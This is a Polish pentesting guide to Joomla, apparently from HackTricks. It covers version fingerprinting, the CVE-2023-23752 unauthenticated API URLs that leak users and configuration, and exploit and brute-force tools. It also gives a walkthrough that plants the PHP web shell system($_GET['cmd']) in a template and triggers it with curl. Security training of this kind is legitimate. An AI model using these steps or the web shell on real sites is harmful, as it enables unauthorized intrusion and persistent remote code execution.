Joomla
Last updated
Last updated
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Pogłęb swoją wiedzę w Bezpieczeństwie Mobilnym z 8kSec Academy. Opanuj bezpieczeństwo iOS i Androida dzięki naszym kursom w trybie samodzielnym i zdobądź certyfikat:
Joomla zbiera anonimowe statystyki użycia, takie jak podział wersji Joomla, PHP oraz wersji baz danych i systemów operacyjnych serwerów używanych w instalacjach Joomla. Te dane można zapytać za pośrednictwem ich publicznego API.
Sprawdź meta
robots.txt
README.txt
W /administrator/manifests/files/joomla.xml możesz zobaczyć wersję.
W /language/en-GB/en-GB.xml możesz uzyskać wersję Joomla.
W plugins/system/cache/cache.xml możesz zobaczyć przybliżoną wersję.
W 80,443 - Metodologia Pentestingu Web to sekcja o skanerach CMS, które mogą skanować Joomla.
Wersje od 4.0.0 do 4.2.7 są podatne na ujawnienie informacji bez uwierzytelnienia (CVE-2023-23752), które ujawnia dane uwierzytelniające i inne informacje.
Użytkownicy: http://<host>/api/v1/users?public=true
Plik konfiguracyjny: http://<host>/api/index.php/v1/config/application?public=true
Moduł MSF: scanner/http/joomla_api_improper_access_checks
lub skrypt ruby: 51334
Możesz użyć tego skryptu, aby spróbować przeprowadzić atak brute force na logowanie.
Jeśli udało Ci się zdobyć dane logowania administratora, możesz uzyskać RCE w jego wnętrzu, dodając fragment kod PHP, aby uzyskać RCE. Możemy to zrobić, dostosowując szablon.
Kliknij na Templates
w lewym dolnym rogu pod Configuration
, aby otworzyć menu szablonów.
Kliknij na nazwę szablonu. Wybierzmy protostar
w nagłówku kolumny Template
. To przeniesie nas na stronę Templates: Customise
.
Na koniec możesz kliknąć na stronę, aby otworzyć źródło strony. Wybierzmy stronę error.php
. Dodamy PHP one-liner, aby uzyskać wykonanie kodu w następujący sposób:
system($_GET['cmd']);
Zapisz i zamknij
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Skrypt do eksploatacji Joomla, który podnosi XSS do RCE lub inne krytyczne luki. Więcej informacji znajdziesz w tym poście. Oferuje wsparcie dla wersji Joomla 5.X.X, 4.X.X i 3.X.X oraz pozwala na:
Podniesienie uprawnień: Tworzy użytkownika w Joomla.
(RCE) Edycja wbudowanych szablonów: Edytuje wbudowane szablony w Joomla.
(Custom) Niestandardowe exploity: Niestandardowe exploity dla wtyczek Joomla innych firm.
Zgłębiaj swoją wiedzę w Bezpieczeństwie Mobilnym z 8kSec Academy. Opanuj bezpieczeństwo iOS i Androida dzięki naszym kursom w trybie samodzielnym i zdobądź certyfikat:
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)